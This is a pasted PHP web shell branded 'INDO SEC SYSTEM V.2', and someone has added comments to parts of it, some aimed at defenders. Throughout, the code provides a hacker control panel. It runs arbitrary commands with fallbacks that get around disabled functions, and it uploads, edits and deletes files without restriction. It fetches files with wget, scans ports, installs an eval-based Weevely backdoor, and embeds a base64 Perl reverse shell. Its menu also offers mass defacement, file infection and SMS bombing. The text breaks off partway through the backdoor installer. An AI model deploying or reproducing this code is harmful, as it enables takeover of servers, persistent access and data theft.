Shell Priv7

a guest Apr 27th, 2018 429 Never
  1. <html>
  2. <LINK rel="SHORTCUT ICON" href="http://d11wbxl9l7koq0.cloudfront.net/ioi-outputs/ef76096adbb7fb197b7632a8a367737a-result.png">
  3. <body>
  4. <?php
  5.  
  6.  
  7.  $head = '
  8. <html>
  9. <head>
  10. </script>
  11. <title>INDO SEC SYSTEM V.2</title>
  12. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  13.  
  14. <STYLE>
  15. body {
  16.     background-image: url(https://s-i.huffpost.com/gen/4393678/images/o-THE-MATRIX-facebook.jpg);
  17.     background-repeat: repeat-x repeat-y;
  18.     background-position: left top;
  19.     font-size: 14px;
  20.     background-attachment: fixed;
  21. font-family: sans;
  22. color: red;
  23. margin:0px 0px 0px 0px;
  24. }
  25. font-family: Courier New
  26. }
  27. tr {
  28. BORDER: line 1px #333;
  29. color: #FFF;
  30. }
  31. td {
  32. BORDER: line 1px #333;
  33. color: #FFF;
  34. }
  35. .table1 {
  36. BORDER: 0px Black;
  37. BACKGROUND-COLOR: Black;
  38. color: #FFF;
  39. }
  40. .td1 {
  41. BORDER: 0px;
  42. BORDER-COLOR: #333333;
  43. font: 7pt Verdana;
  44. color: White;
  45. }
  46. .tr1 {
  47. BORDER: 0px;
  48. BORDER-COLOR: #333333;
  49. color: #FFF;
  50. }
  51. table {
  52. BORDER: line 1px #333;
  53. BORDER-COLOR: #333333;
  54. BACKGROUND-COLOR: Black;
  55. color: #FFF;
  56. }
  57. input {
  58. border          : line 1px;
  59. border-color        : #333;
  60. BACKGROUND-COLOR: #111111;
  61. font: 9pt Verdana;
  62. color: Red;
  63. }
  64. select {
  65. BORDER-RIGHT:  Black 1px solid;
  66. BORDER-TOP:    #DF0000 1px solid;
  67. BORDER-LEFT:   #DF0000 1px solid;
  68. BORDER-BOTTOM: Black 1px solid;
  69. BORDER-color: #FFF;
  70. BACKGROUND-COLOR: #111111;
  71. font: 8pt Verdana;
  72. color: Red;
  73. }
  74. submit {
  75. BORDER:  buttonhighlight 2px outset;
  76. BACKGROUND-COLOR: #111111;
  77. width: 30%;
  78. color: #FFF;
  79. }
  80. textarea {
  81. border          : line 1px #333;
  82. BACKGROUND-COLOR: #111111;
  83. font: Fixedsys bold;
  84. color: #999;
  85. }
  86. BODY {
  87.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  88. margin: 1px;
  89. color: Red;
  90. background-color: #111111;
  91. }
  92. .main {
  93. margin          : -287px 0px 0px -490px;
  94. BORDER: line 1px #333;
  95. BORDER-COLOR: #333333;
  96. }
  97. .tt {
  98. background-color: transparent;
  99. }
  100.  
  101. A:link {
  102.     COLOR: White; TEXT-DECORATION: none
  103. }
  104. A:visited {
  105.     COLOR: White; TEXT-DECORATION: none
  106. }
  107. A:hover {
  108.     color: Red; TEXT-DECORATION: none
  109. }
  110. A:active {
  111.     color: Red; TEXT-DECORATION: none
  112. }
  113. </STYLE>
  114. <script language=\'javascript\'>
  115. function hide_div(id)
  116. {
  117.   document.getElementById(id).style.display = \'none\';
  118.   document.cookie=id+\'=0;\';
  119. }
  120. function show_div(id)
  121. {
  122.   document.getElementById(id).style.display = \'block\';
  123.   document.cookie=id+\'=1;\';
  124. }
  125. function change_divst(id)
  126. {
  127.   if (document.getElementById(id).style.display == \'none\')
  128.     show_div(id);
  129.   else
  130.     hide_div(id);
  131. }
  132. </script>'; ?>
  133. <?php
// Turn off all PHP error reporting for the rest of the request, so failures
// in the operations below leave no on-page or (depending on configuration)
// logged trace.
error_reporting(0);
#chdir('');
//Some basic var's
// Working directory for the file browser: the `path` query parameter when it
// is present and truthy, otherwise the script's own working directory. The
// request value only passes through CleanDir(), which rewrites slashes; no
// confinement to a base directory is visible here.
if (!@$_GET['path']) {
    $dir = CleanDir(getcwd());
} else {
    $dir = CleanDir($_GET['path']);
}
// Request and server facts reused by the page and by the redirects it emits.
// HTTP_HOST and REQUEST_URI are client-controlled values.
$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
$domain = $_SERVER['HTTP_HOST'];
$script = $_SERVER['SCRIPT_NAME'];
$full_url = $_SERVER['REQUEST_URI'];
$script2 = basename($script);
$serverip = $_SERVER['SERVER_ADDR'];
$userip = $_SERVER['REMOTE_ADDR'];
// Account the PHP process runs as: the passwd entry of the effective UID when
// the posix extension is loaded, otherwise the output of a spawned `whoami`.
// The second statement reduces the passwd array to its 'name' field, or runs
// `whoami` a second time on the fallback path.
$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
// Raw disable_functions setting; normalised to "None" further down when empty.
$disabled = ini_get('disable_functions');
  152. //Perl back connect script by LorD
  153. //Encoded in base64 for convenience
  154. $bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0
KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
// Lift PHP's per-request resource limits (memory, execution time, upload
// size). Each call is prefixed with "@", so a host that refuses the change
// produces no visible warning.
@ini_set("memory_limit", "9999M");
@ini_set("max_execution_time", "0");
@ini_set("upload_max_filesize", "9999m");
// NOTE(review): magic_quotes_gpc and set_magic_quotes_runtime() only exist on
// legacy PHP releases, which suggests the script was written for PHP 5.x.
@ini_set("magic_quotes_gpc", "0");
@set_magic_quotes_runtime(0);
set_time_limit(0);
// An empty disable_functions list is shown as the literal string "None".
if (empty($disabled)) {
    $disabled = "None";
}
  164. //Some functions
  165. function CleanDir($directory) {
  166.     $directory = str_replace("\\", "/", $directory);
  167.     $directory = str_replace("//", "/", $directory);
  168.     return $directory;
  169. }
  170. function success($for, $var1) {
  171.     $domain = $_SERVER['HTTP_HOST'];
  172.     $script = $_SERVER['SCRIPT_NAME'];
  173.     $full_url = $_SERVER['REQUEST_URI'];
  174.     if ($for == "filesave") {
  175.         $message = "File Saved!";
  176.         $redirect = "http://$domain$script?path=$var1";
  177.     }
  178.     if ($for == "filedelete") {
  179.         $message = "File Deleted!";
  180.         $redirect = "http://$domain$script?path=$var1";
  181.     }
  182.     if ($for == "createdir") {
  183.         $message = "Directory Created!";
  184.         $redirect = "http://$domain$script?path=$var1";
  185.     }
  186.     if ($for == "dir_exists") {
  187.         $message = "Directory Already Exists!";
  188.         $redirect = "http://$domain$script?path=$var1";
  189.     }
  190.     if ($for == "file_exists") {
  191.         $message = "File Already Exists!";
  192.         $redirect = "http://$domain$script?editfile=$var1";
  193.     }
  194.     if ($for == "file_created") {
  195.         $message = "File Created!";
  196.         $redirect = "http://$domain$script?editfile=$var1";
  197.     }
  198.     if ($for == "file_uploaded") {
  199.         $message = "File Uploaded!";
  200.         $redirect = "http://$domain$full_url";
  201.     }
  202.     if ($for == "shell_killed") {
  203.         $message = "Shell Killed!";
  204.         $redirect = "http://$domain$script";
  205.     }
  206.     if ($for == "dir_del") {
  207.         $message = "Directory Deleted!";
  208.         $redirect = "http://$domain$script?path=$var1";
  209.     }
  210.     if ($for == "dir_renamed") {
  211.         $message = "Directory Renamed!";
  212.         $redirect = "http://$domain$script?path=$var1";
  213.     }
  214.     if ($for == "file_renamed") {
  215.         $message = "File Renamed!";
  216.         $redirect = "http://$domain$script?path=$var1";
  217.     }
  218.     if ($for == "configs_found") {
  219.         $message = "$var1 Configs Found!";
  220.         $redirect = "";
  221.     }
  222.     if ($for == "unzip") {
  223.         $message = "Successfully Unzipped File!";
  224.         $redirect = "http://$domain$script?path=$var1";
  225.     }
  226.     if ($for == "files_found") {
  227.         $message = "$var1 files found!";
  228.         $redirect = "";
  229.     }
  230.     if ($for == "weevely") {
  231.         $message = "Weevely BackDoor Installed!";
  232.         $redirect = "";
  233.     }
  234.     echo "<div id='xbox'><embed
  235.    src='http://p0wersurge.com/js/achievementnopic.swf'
  236.    width='300'
  237.    height='80'
  238.    flashvars='Text=$message&gs=1337'
  239.    wmode='transparent'/></div>";
  240.     if (empty($redirect)) {
  241.         echo "<script>
  242. function remove (){
  243.  document.getElementById('xbox').innerHTML='';
  244. }
  245. setInterval(function(){remove();}, 2700);
  246. </script>";
  247.     } else {
  248.         echo "<script>
  249. function remove (){
  250.  window.location = '$redirect'
  251. }
  252. setInterval(function(){remove();}, 2500);
  253. </script>";
  254.     }
  255. }
  256. function error($mesg) {
  257.     $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
  258.     echo "$error";
  259. }
  260. function ByteConversion($bytes, $precision = 2) {
  261.     $kilobyte = 1024;
  262.     $megabyte = $kilobyte * 1024;
  263.     $gigabyte = $megabyte * 1024;
  264.     $terabyte = $gigabyte * 1024;
  265.     if (($bytes >= 0) && ($bytes < $kilobyte)) {
  266.         return $bytes . ' B';
  267.     } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
  268.         return round($bytes / $kilobyte, $precision) . ' KB';
  269.     } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
  270.         return round($bytes / $megabyte, $precision) . ' MB';
  271.     } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
  272.         return round($bytes / $gigabyte, $precision) . ' GB';
  273.     } elseif ($bytes >= $terabyte) {
  274.         return round($bytes / $terabyte, $precision) . ' TB';
  275.     } else {
  276.         return $bytes . ' B';
  277.     }
  278. }
  279. //Mass File Function
  280. function files($mass_dir) {
  281.     if ($dh = opendir($mass_dir)) {
  282.         $files = array();
  283.         $inner_files = array();
  284.         while ($file = readdir($dh)) {
  285.             if ($file != "." && $file != ".." && $file[0] != '.') {
  286.                 if (is_dir($mass_dir . "/" . $file)) {
  287.                     $inner_files = files("$mass_dir/$file");
  288.                     if (is_array($inner_files)) $files = array_merge($files, $inner_files);
  289.                 } else {
  290.                     array_push($files, "$mass_dir/$file");
  291.                 }
  292.             }
  293.         }
  294.         closedir($dh);
  295.         return $files;
  296.     }
  297. }
//Upload File
// Unrestricted upload handler. Both the destination directory
// (`upload_location`) and the stored file name (the client-supplied
// $_FILES name) come from the request; no extension, MIME-type or location
// check is applied before move_uploaded_file(). Defensive takeaway: a
// web-writable, PHP-executable directory is all this needs in order to plant
// further scripts.
if (isset($_POST['do_upload_file'])) {
    $udir = $_POST['upload_location'];
    $uname = $_FILES['upload_file']['name'];
    // Existence is tested on directory and name joined without a separator,
    // while the move below joins them with "/".
    $both = "$udir$uname";
    if (file_exists($both)) {
        success("file_exists", $both);
    } else {
        // Only upload error code 0 is handled; other codes fall through
        // silently.
        switch ($_FILES['upload_file']['error']) {
            case 0:
                if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
                    success("file_uploaded");
                } else {
                    error("Failed To Upload File!");
                }
        }
    }
}
//wget file
// Remote fetch: the `wget_file` POST field is appended verbatim to a `wget`
// command line and run through cmd2() in the current browse directory, so the
// field reaches the system shell unquoted. The command output is shown in a
// textarea. For defenders, a web-server account spawning wget is a useful
// process-lineage signal.
if (isset($_POST['do_wget_file'])) {
    $wget_file = $_POST['wget_file'];
    $wecmd = "wget $wget_file";
    $wget_ecmd = cmd2($wecmd, $dir);
    echo "<center><font color='#14ab00'>
Result:<br>
<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
$wget_ecmd
</textarea></font></center><br><br>";
}
  327. //Execute command
/**
 * Run an arbitrary command line in a given directory and return its output.
 *
 * This is the script's command-execution primitive. $cmd is handed to the
 * process-spawning function unchanged, with no quoting or allow-list.
 * It tries proc_open() first and then falls back through exec(), system(),
 * shell_exec() and passthru(), so a disable_functions policy only stops it
 * when it covers every function in that chain.
 *
 * @param string $cmd  Command line to execute.
 * @param string $path Directory to chdir() into before running the command.
 * @return string|null Command output; HTML-escaped on the proc_open paths.
 */
function cmd2($cmd, $path) {
    chdir($path);
    // Re-read the disable_functions setting; an empty list becomes "None".
    $disabled = ini_get('disable_functions');
    if (empty($disabled)) {
        $disabled = "None";
    }
    if ($disabled == "None") {
        // Nothing disabled: spawn the command with stdout (1) and stderr (2)
        // captured through pipes.
        $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        // stdout is drained completely before stderr is read; each line is
        // HTML-escaped and appended to $res, which has no initial assignment.
        while (!feof($io[1])) {
            $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($execute);
        return $res;
    } elseif (function_exists("proc_open")) {
        // Some functions are disabled but proc_open still exists: same
        // capture logic as the branch above.
        $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!feof($io[1])) {
            $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($execute);
        return $res;
    } elseif (function_exists("exec")) {
        // The remaining fallbacks return the function's own result without
        // HTML escaping.
        $res = exec($cmd);
        return $res;
    } elseif (function_exists("system")) {
        $res = system($cmd);
        return $res;
    } elseif (function_exists("shell_exec")) {
        $res = shell_exec($cmd);
        return $res;
    } elseif (function_exists("passthru")) {
        $res = passthru($cmd);
        return $res;
    } else {
        // No execution function is available: report it and return nothing.
        error("The necessary functions to execute commands are disabled!");
    }
}
  374. //Unzip function
/**
 * Extract a ZIP archive into a directory.
 *
 * Uses ZipArchive when the archive opens; otherwise it shells out to the
 * `unzip` binary through cmd2() with the file name interpolated unquoted
 * into the command line. Neither path inspects the archive's entry names
 * before extraction.
 *
 * @param string $filename  Archive to extract.
 * @param string $directory Extraction target (also the working directory of
 *                          the shell fallback).
 * @return void
 */
function unzip($filename, $directory) {
    $zip = new ZipArchive;
    $res = $zip->open($filename);
    // ZipArchive::open() yields TRUE on success and an error code otherwise,
    // hence the strict comparison.
    if ($res === TRUE) {
        $zip->extractTo($directory);
        $zip->close();
        success("unzip", $directory);
    } else {
        // Fallback: the output of the shell command is discarded, so neither a
        // success nor an error banner is shown on this path.
        cmd2("unzip $filename", $directory);
    }
}
//Get files and directories and throw them into an array.
// $dir is the browse directory chosen from the `path` query parameter (or the
// script's working directory), so this enumerates whatever location the
// request names, as far as the PHP process can read it.
$open = opendir($dir);
$files = array();
$direcs = array();
while ($file = readdir($open)) {
    // Skip only the "." and ".." entries; hidden files are listed.
    if ($file != "." && $file != "..") {
        if (is_dir("$dir/$file")) {
            array_push($direcs, $file);
        } else {
            array_push($files, $file);
        }
    }
}
// Sort both lists by name (asort keeps the original numeric keys). The
// directory handle is not closed in this run of statements.
asort($direcs);
asort($files);
  401. ?>
  402. <html>
  403. <head>
  404. <?php
  405.         echo $head ;
  406.         echo '
  407.  
  408. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  409.  
  410.            
  411.  
  412.  
  413.        <td width="100%" align=center valign="top" rowspan="1">
  414.            <font color=red size=8 face="Wallpoet"><b>Indonesian</font><font color=white size=8 face="Wallpoet"><b>  Security</font><font color=Blue size=8 face="Wallpoet"><b> System </font> <div class="hedr">
  415.  
  416.         <td height="10" align="left" class="td1"></td></tr><tr><td
  417.         width="100%" align="center" valign="top" rowspan="1"><font
  418.         color="red" face="comic sans ms"size="3"><b>
  419.         <font color=red>
  420.        
  421.        
  422.        
  423.         [+] IndonesianSecuritySystem [+]
  424.                        
  425.            </table>
  426.            
  427.        
  428.  
  429. ';
  430.  
  431. ?>
  432. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>Second Generation of KuncenCyberTeam Shell</font><br></td></tr></table>
  433. </head>
  434. <p></p>
  435. <p></p>
  436. <body bgcolor="black"><body bgcolor="black">
  437. <table border=1 width=100%><td width=15% align=right><font color=red size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname()  ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
  438. </table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
  439. </table>
  440. <center><div id="menu">
  441. <a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=white> [Home] </font></a>
  442. <a href="<?php echo '?perlbackconnect';?>"><font size=4 face="Wallpoet" color=red> [Perl Back Connect] </font></a>
  443. <a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=white> [Python Back connect] </font></a>
  444. <a href="<?php echo '?encrypt';?>"><font size=4 face="Wallpoet" color=red> [Encrypt] </font></a>
  445. <a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=white> [Mass Deface] </font></a>
  446. <a href="<?php echo '?massinfect';?>"><font size=4 face="Wallpoet" color=red> [Mass File Infect] </font></a>
  447. <a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=white> [Install MSD] </font></a>
  448. <p></p>
  449. <a href="<?php echo '?sms';?>"><font size=4 face="Wallpoet" color=red> [SMS Bomber] </font></a>
  450. <a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=white> [Reverse IP] </font></a>
  451. <a href="<?php echo '?weev';?>"><font size=4 face="Wallpoet" color=red> [Weevely Backdoor] </font></a>
  452. <a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=white> [Port Scan] </font></a>
  453. </div></center>
  454. <p></p>
  455. <p></p>
  456. <p></p>
  457. <?php
// "Encrypt" page: despite the name this only hashes. It shows a one-field
// form and, on submit, prints the input hashed in several formats.
if (isset($_GET['encrypt'])) {
    echo "<form action='' method='post'>
<center><font color='#14ab00'>
<input type='text' name='en_string' class='text'>
<input type='submit' name='do_encrypt' value='Encrypt String'>
</form>
</font></center>";
}
if (isset($_POST['do_encrypt'])) {
    // gen_salt() is defined outside the lines shown here; presumably it
    // returns a random salt of the requested length - TODO confirm.
    $vbsalt = gen_salt("30");
    $vbsalt2 = gen_salt("3");
    $mybbsalt = gen_salt("8");
    $ipbsalt = gen_salt("5");
    $joomlasalt = gen_salt("32");
    $password = $_POST['en_string'];
    // Plain and nested MD5, SHA-1 and SHA-256 digests of the input.
    $md5 = md5($password);
    $md52 = md5(md5($password));
    $md53 = md5(md5(md5($password)));
    $sha1 = sha1($password);
    $sha256 = hash('sha256', $password);
    // Salted MD5 constructions, labelled in the output below with the forum
    // and CMS products they are meant to match.
    $vbalg = md5(md5($password) . $vbsalt);
    $vbalg2 = md5(md5($password) . $vbsalt2);
    $mybbalg = md5(md5($mybbsalt) . $password);
    $ipbalg = md5(md5($ipbsalt) . md5($password));
    $joomlaalg = md5($password . $joomlasalt);
    // The submitted string is echoed back inside the textarea without HTML
    // escaping.
    $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
    echo "<center>
<textarea rows='20' cols='150' style='color:#00ff00'>
$en_result
</textarea>
</center><br>";
}
  490. ?>
  491. <?php
  492. //Port scan
// Port-scan page: renders the form, pre-filled with the request's Host header.
if (isset($_GET['scan'])) {
    echo "<center><font color='#14ab00' size='3'>
Port Scan:<br>
<form action='' method='post'>
Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
Start port: <input type='text' name='start_port' class='text' size='6'>
End port: <input type='text' name='end_port' class='text' size='7'><br>
<input type='submit' name='start_scan' value='Scan'>
</form>
</font>
</center>";
}
// Sequential TCP connect attempts made from the web server itself, so the
// traffic originates from the compromised host rather than from the operator.
// Host and port range come straight from the POST body with no validation or
// upper bound. For defenders, a burst of outbound connections from the
// web-server account to consecutive ports is the observable side of this.
if (isset($_POST['start_scan'])) {
    $scanhost = $_POST['scan_host'];
    $startport = $_POST['start_port'];
    $endport = $_POST['end_port'];
    while ($startport <= $endport) {
        // 3-second connect timeout per port; the returned socket is never
        // closed. Host and port are echoed without HTML escaping.
        if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
            echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
        } else {
            echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
        }
        $startport++;
    }
}
  518. ?>
  519. <?php
  520. //Edit file stuff
// File editor: reads, overwrites, deletes or creates whatever path the
// `editfile` query parameter names. No authentication or path restriction is
// visible in the lines shown, so the only limit is what the PHP process
// account may read and write on the file system.
if (!empty($_GET['editfile'])) {
    $edfile = $_GET['editfile'];
    // Parent directory, used as the redirect target after save/delete.
    $redirectloc = dirname($edfile);
    echo "<form method='POST'><center>";
    if (file_exists($edfile)) {
        // Existing file: load it and HTML-escape it for display in a textarea.
        // The magic-quotes branches only matter on legacy PHP versions.
        if (get_magic_quotes_gpc()) {
            $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
        } else {
            $file_content = htmlspecialchars(file_get_contents($edfile));
        }
        if (is_writeable($edfile)) {
            echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
<br><br>
        <input type='submit' name='savedit' value='Save' />
        <input type='submit' name='deletefile' value='Delete' />
        </form></center>";
            if (isset($_POST['savedit'])) {
                // Save: overwrite the file with the posted textarea content.
                if (get_magic_quotes_gpc()) {
                    $edfilecontent = stripslashes($_POST['edfile_contents']);
                } else {
                    $edfilecontent = $_POST['edfile_contents'];
                }
                // file_put_contents() returns the byte count, so writing an
                // empty body (0 bytes) is reported as a failure.
                if (file_put_contents($edfile, $edfilecontent)) {
                    success("filesave", rtrim($redirectloc, "/"));
                } else {
                    error("Failed to save file!");
                }
            } else if (isset($_POST['deletefile'])) {
                // Delete: remove the file and return to its directory.
                if (unlink($edfile)) {
                    success("filedelete", rtrim($redirectloc, '/'));
                } else {
                    error("Failed to delete file!");
                }
            }
        } else {
            // Not writable by the PHP process: show the content read-only.
            echo "<font color='red'><b>File is read only!</b></font><br>
<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
        }
        echo "</center>";
    } else {
        // Path does not exist: offer to create it with the posted content.
        echo "<form method='POST'><center>";
        echo "<font color='red'><b>File does not exist!</b></font><br>
<textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
</textarea><br><br>
 <input type='submit' name='savefile' value='Create File' /><br /><br />
        </form></center>";
        if (isset($_POST['savefile'])) {
            if (get_magic_quotes_gpc()) {
                $newfilecontent = stripslashes($_POST['newfile_contents']);
            } else {
                $newfilecontent = $_POST['newfile_contents'];
            }
            if (file_put_contents($edfile, $newfilecontent)) {
                success("filesave", rtrim($redirectloc, "/"));
            } else {
                error("Failed to save file!");
            }
        }
    }
}
  581. ?>
  582. <?php
  583. //Weevely backdoor
// Secondary-backdoor installer page: form asking for a target directory, a
// file name and a password.
if (isset($_GET['weev'])) {
    echo "<center><font color='#14ab00' size='3'>
<form action='' method='post'>
Directory to install weevely backdoor:<br>
<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
Name of file (something .php):<br>
<input type='text' name='weev_name' class='text' value='weevely.php'><br>
Password (more than 3 characters):<br>
<input type='text' name='weev_pass' class='text'><br>
<input type='submit' name='install_weev' value='BackDoor'><br>
</font>
</center>";
}
// Persistence step: writes a second, much smaller PHP backdoor to a
// request-chosen path, so removing this script alone does not evict the
// intruder. What to hunt for on disk is a short PHP file whose whole body is
// `eval(base64_decode('...'))`, created by the web-server account.
if (isset($_POST['install_weev'])) {
    $weevdir = rtrim($_POST['weev_dir'], '/');;
    $weevname = $_POST['weev_name'];
    $weevpassword = $_POST['weev_pass'];
    // The check rejects fewer than 3 characters, although the message says
    // "longer than 3".
    if (strlen($weevpassword) < 3) {
        error("Password must be longer than 3 characters!");
    } else {
        // The password is split: the first two characters and the remainder
        // are embedded separately in the generated code.
        $first2 = $weevpassword[0] . $weevpassword[1];
        $rest = substr($weevpassword, 2);
        // "$" is kept in a variable so the generated source can contain
